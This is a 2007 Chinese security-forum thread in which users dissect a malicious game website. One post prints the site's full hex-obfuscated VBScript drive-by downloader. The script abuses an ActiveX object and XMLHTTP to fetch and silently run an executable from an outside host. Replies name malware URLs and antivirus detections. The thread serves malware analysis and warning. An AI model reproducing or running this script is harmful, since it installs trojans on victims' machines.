今天找游戏，一上这网页我的卡巴就挂了。

显示全部楼层 · 发表于 2007-7-3 22:26:03

我看了一下那个加密的网页，这是加密的内容：

<SCRIPT language=VBScript>
S="6f6E206572726f7220726573756d65206e6578740D0a6375726c3D22687474703A2f2f78787476622E636E2F6172702F7869"
S=S+"617a61692e657865220d0a666E616d65313d227869617a61692e657865220D0a666E616D65323D227869617a61692E766273"
S=S+"220D0A536574206466203d20646F63756d656e742e637265617465456C656d656e7428226F626A65637422290d0A64662e73"
S=S+"65744174747269627574652022636C6173736964222C2022636C7369643a42443936433535362D363541332d313144302d39"
S=S+"3833412d303043303446433239453336220D0A7374723d224D6963726f736f66742e584D4C48545450220D0a536574207820"
S=S+"3D2064662e4372656174654f626a656374287374722c2222290D0A43313d2241646f220D0A43323D2264622E220d0a43333d"
S=S+"22737472220d0A43343d2265616d220d0A737472313d43312643322643332643340D0A737472353d737472310d0a73657420"
S=S+"53203D2064662e6372656174656f626a65637428737472352C2222290d0a532E74797065203d20310d0a737472363D224745"
S=S+"54220D0A782e4F70656e20737472362C206375726c2c2046616C73650d0A782E53656e640D0A73313d22536372697074220D"
S=S+"0A73323D22696e672e220d0a73333d2246696c65220d0a73343D2253797374656D4f626A656374220d0A73303d73312b7332"
S=S+"2b73332B73340d0A7365742046203D2064662e6372656174656F626A6563742873302c2222290d0a73657420746d70203D20"
S=S+"462E4765745370656369616c466F6C6465722832290d0a666E616D65313D20462e4275696C645061746828746D702C666e61"
S=S+"6D6531290D0a532e6f70656e0d0A532e777269746520782e726573706F6e7365426f64790d0a532E73617665746F66696c65"
S=S+"20666e616d65312c320d0a532E636c6F73650D0a666e616d65323D20462E4275696c645061746828746d702C666E616d6532"
S=S+"290d0a536574207473203d20462E4f70656e5465787446696C6528666E616D65322C20322C2054727565290d0a74732e5772"
S=S+"6974654c696e652022536574205368656c6C203D204372656174654f626a656374282222577363726970742E5368656C6c22"
S=S+"2229220D0A73716C3D225368656c6C2e52756e282222222B666E616D65312B22222229220d0A74732e57726974654C696e65"
S=S+"2073716C0D0A74732e57726974654c696E652022736574205368656c6c3D4e6F7468696e67220d0a74732E636c6F73650D0A"
S=S+"696620462e46696c6545786973747328666E616d6531293d74727565207468656e0D0a696620462E46696c65457869737473"
S=S+"28666e616D6532293D74727565207468656E0d0A202020207368613D225368656C6C2E417070220d0A202020207368623D73"
S=S+"68610D0a202020207365742051203D2064662e6372656174656f626a656374287368622b226c69636174696f6e222c222229"
S=S+"0D0a20202020512E5368656C6c4578656375746520666E616D65322c22222C22222c226f70656E222C300d0A656e64206966"
S=S+"0D0A656E642069660D0a"
flag_type="vbs"
D=""
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D&m
S=mymid(S)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
if flag_type="html" then
document.write(D)
end if
</SCRIPT>
<SCRIPT language=javaScript>
if (flag_type=="js") {
eval(D);}

解密后实际下载的是hxxp://xxtvb.cn/arp/xiazai.exe，没发现你之前说的那个文件，难道还有被嵌的网页？

显示全部楼层 · 发表于 2007-7-3 22:27:06

原帖由 moonsilver 于 2007-7-3 22:24 发表
还有个ANI，汗

晕，这是那个vip3.htm的吧，没去看他，看到baidu就直接跳过了，我以为是刷排名的

显示全部楼层 · 发表于 2007-7-3 22:28:06

这个detected: virus Virus.Win32.AutoRun.z URL: http://xxtvb.cn/arp/xiazai.exe

显示全部楼层 · 发表于 2007-7-3 22:29:37

想看启发，结果已经入库，失望

显示全部楼层 · 发表于 2007-7-3 22:29:48

Trojan.DL.Mnless.ajs

xiazai.exe

显示全部楼层 · 发表于 2007-7-3 22:31:36

太深奥了。学习

显示全部楼层 · 发表于 2007-7-4 06:56:09

BitDefender

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.
Trojan.Dropper.OnLineGames.A
Exploit.Win32.MS05-002.Gen

显示全部楼层 · 发表于 2007-7-4 08:57:02

kis7（最高启发）

已检测到: 木马程序 Backdoor.Win32.Agent.ahj URL: http://61.152.169.234/flash.exe//PE_Patch

显示全部楼层 · 发表于 2007-7-4 09:15:43

微点砍掉

[病毒样本] 今天找游戏，一上这网页我的卡巴就挂了。

本帖子中包含更多资源

浏览过的版块